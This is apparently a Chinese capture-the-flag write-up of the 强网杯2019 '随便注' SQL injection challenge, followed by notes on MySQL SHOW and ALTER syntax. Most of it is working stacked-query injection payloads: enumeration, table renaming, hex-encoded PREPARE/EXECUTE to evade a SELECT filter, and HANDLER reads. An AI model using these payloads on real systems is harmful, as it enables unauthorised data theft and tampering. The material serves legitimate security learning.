输入1‘
输入1“
和输入1 一样说明是由‘闭合
然后我们尝试输入select
这里提示过滤了select,说明联合查询,报错注入,布尔,时间盲注就都不可以使用了。我们只剩下了 堆叠注入。 或者将select编码绕开也可以。
按sql注入测试1' or 1=1 #
1' order by 1 #直到3报错
因为知道了select被过滤了,使用堆叠注入
先通过show databases爆出数据库。
0'; show databases; #
然后用 show tables 尝试爆表。
0'; show tables; #
可以看到这里有两个表,我们先尝试爆words表的内容。
1'; show columns from words; #
然后报表 1919810931114514 的内容。
这里学到一个新知识点,表名为数字时,要用反引号包起来查询。
1'; show columns from `1919810931114514`; #
可以发现爆出来了flag字段,然而我对于flag毫无办法,这里看别的大佬的wp
解题思路1:
借鉴 : 强网杯2019随便注
1,通过 rename 先把 words 表改名为其他的表名。
2,把 1919810931114514 表的名字改为 words 。
3 ,给新 words 表添加新的列名 id 。
4,将 flag 改名为 data 。
1'; rename table words to word1; rename table `1919810931114514` to words;alter table words add id int unsigned not Null auto_increment primary key; alter table words change flag data varchar(100);#
解题思路2:
借鉴buuoj强网杯2019随便注
因为select被过滤了,所以先将select * from ` 1919810931114514 `进行16进制编码
再通过构造payload得
;SeT@a=0x73656c656374202a2066726f6d20603139313938313039333131313435313460;prepare execsql from @a;execute execsql;#
进而得到flag
prepare…from…是预处理语句,会进行编码转换。
execute用来执行由SQLPrepare创建的SQL语句。
SELECT可以在一条语句里对多个变量同时赋值,而SET只能一次对一个变量赋值。
解题思路3:
寒假之后打了打i春秋的比赛,里面的一道web题black_list简直就是这道题的进化版,当时实在做不出来。。。还是太菜了
比赛后复现用的payload:
1'; handler `FlagHere` open as `a`; handler `a` read next;#
1';HANDLER FlagHere OPEN; HANDLER FlagHere READ FIRST; HANDLER FlagHere CLOSE;#
这个方法同样适用于这道题,payload:
1'; handler `1919810931114514` open as `a`; handler `a` read next;#
1’;Set @sql=concat(“s”,“elect * from 1919810931114514
”);PREPARE sqla from @sql;EXECUTE sqla; #
?inject=1’;prepare pysnow from concat(‘se’,‘lect flag from 1919810931114514
’);execute pysnow;%23
知识点总结:
先总结这道题学会的新知识 alter ,show 和 SQL约束 。
show
在过滤了 select 和 where 的情况下,还可以使用 show 来爆出数据库名,表名,和列名。
show datebases; //数据库。
show tables; //表名。
show columns from table; //字段。
alter
作用:修改已知表的列。( 添加:add | 修改:alter,change | 撤销:drop )
用法:
alter table " table_name" add " column_name" type;
alter table " table_name" drop " column_name" type;
alter table " table_name" alter column " column_name" type;
alter table " table_name" change " column1" " column2" type;
alter table "table_name" rename "column1" to "column2";
alter table persons modify age int not null;//设置 not null 约束 。
alter table person modify age int null;//取消 null 约束。
alter table persons add age primary key (id)
alter table person add unique (id);//增加unique约束。
alter table person add check (id>0);
alter table person alter city set default 'chengdu' ;//mysql
alter table person add constraint ab_c default 'chengdu' for city;//SQL Server / MS Access
auto_increment-自动赋值,默认从1开始。
foreign key-保证一个表中的数据匹配另一个表中的值的参照完整性。